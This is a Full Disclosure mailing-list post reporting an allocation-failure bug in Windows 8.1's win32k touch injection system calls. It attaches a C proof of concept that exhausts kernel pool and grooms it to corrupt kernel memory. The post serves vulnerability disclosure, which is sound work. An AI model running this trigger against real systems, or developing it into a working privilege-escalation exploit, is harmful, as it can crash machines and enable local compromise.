Perhaps this is an unfair oversimplification, but a humorous (to me) summary of the SDL might be "security is solved because old code is irrelevant and new code is perfect". For this reason, I can't help finding it amusing that both old and new Microsoft code keeps failing so spectacularly.
I mentioned some ancient code that fails yesterday, here's a fun example of brand new code failing. There is a new Windows 8+ only feature I've been looking at, the Touch Injection API: http://msdn.microsoft.com/en-us/library/windows/desktop/hh802898(v=vs.85).aspx The feature is backed by two new system calls, win32k!NtUserInitializeTouchInjection and win32k!NtUserInjectTouchInput. When you initialize touch injection, you specify the maximum number of simultaneous contacts you want to support, up to MAX_TOUCH_CONTACTS. This allocates enough space for the appropriate structures. Unfortunately, win32k!InitializeTouchInjectionWithQDCData doesn't handle allocation failure correctly. This can be exploited by allocating all available pool, and then increasing the number of contacts requested. I have a reliable test case for this issue, attached for reference or at the URL below (only tested on x86, but I don't see why it wouldn't work on x64). https://gist.github.com/taviso/4cfc3035e99f2ea1377e -- ------------------------------------- [email protected] | pgp encrypted mail preferred -------------------------------------------------------
#ifndef WIN32_NO_STATUS # define WIN32_NO_STATUS #endif #include <windows.h> #include <assert.h> #include <stdio.h> #include <winerror.h> #include <winternl.h> #include <stddef.h> #include <winnt.h> #ifdef WIN32_NO_STATUS # undef WIN32_NO_STATUS #endif #include <ntstatus.h> #pragma comment(lib, "ntdll") #pragma comment(lib, "user32") #pragma comment(lib, "gdi32") #pragma comment(lib, "advapi32") // InitializeTouchInjection() Win8.1 Testcase // -- Tavis Ormandy <[email protected]>, Feb 2014. int main(int argc, char **argv) { POINTER_TOUCH_INFO Contact; SID_AND_ATTRIBUTES SidToRestricted; ULONG Size; HANDLE Handle; ZeroMemory(&Contact, sizeof Contact); ZeroMemory(&SidToRestricted, sizeof SidToRestricted); // I *think* TOUCH_MASK_CONTACTAREA is required (i.e. rcContact), the rest // just need to be valid. Contact.pointerInfo.pointerType = PT_TOUCH; Contact.pointerInfo.pointerFlags = POINTER_FLAG_DOWN | POINTER_FLAG_INRANGE | POINTER_FLAG_INCONTACT; Contact.pointerInfo.ptPixelLocation.x = 'AAAA'; Contact.pointerInfo.ptPixelLocation.y = 'AAAA'; Contact.rcContact.left = 'AAAA'; Contact.rcContact.right = 'AAAA'; Contact.rcContact.top = 'AAAA'; Contact.rcContact.bottom = 'AAAA'; Contact.touchFlags = TOUCH_FLAG_NONE; Contact.touchMask = TOUCH_MASK_CONTACTAREA; Size = SECURITY_MAX_SID_SIZE; Handle = INVALID_HANDLE_VALUE; SidToRestricted.Sid = _alloca(Size); CreateWellKnownSid(WinNullSid, NULL, SidToRestricted.Sid, &Size); // This just exhausts available pool (how that's accomplished is irrelevant). for (Size = 1 << 26; Size; Size >>= 1) { while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1)) ; } for (;;) { // Initialize touch injection with very small number of contacts. InitializeTouchInjection(1, TOUCH_FEEDBACK_DEFAULT); // Now increase the number of contacts, which should (eventually) cause an allocation fail. InitializeTouchInjection(MAX_TOUCH_COUNT, TOUCH_FEEDBACK_DEFAULT); // I think this will just massage the pool, sequence found by fuzzing. OpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &Handle); CreateRestrictedToken(Handle, 0, 0, NULL, 0, NULL, 1, &SidToRestricted, &Handle); // Write something to the touch injection allocation. InjectTouchInput(1, &Contact); } return 0; }
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
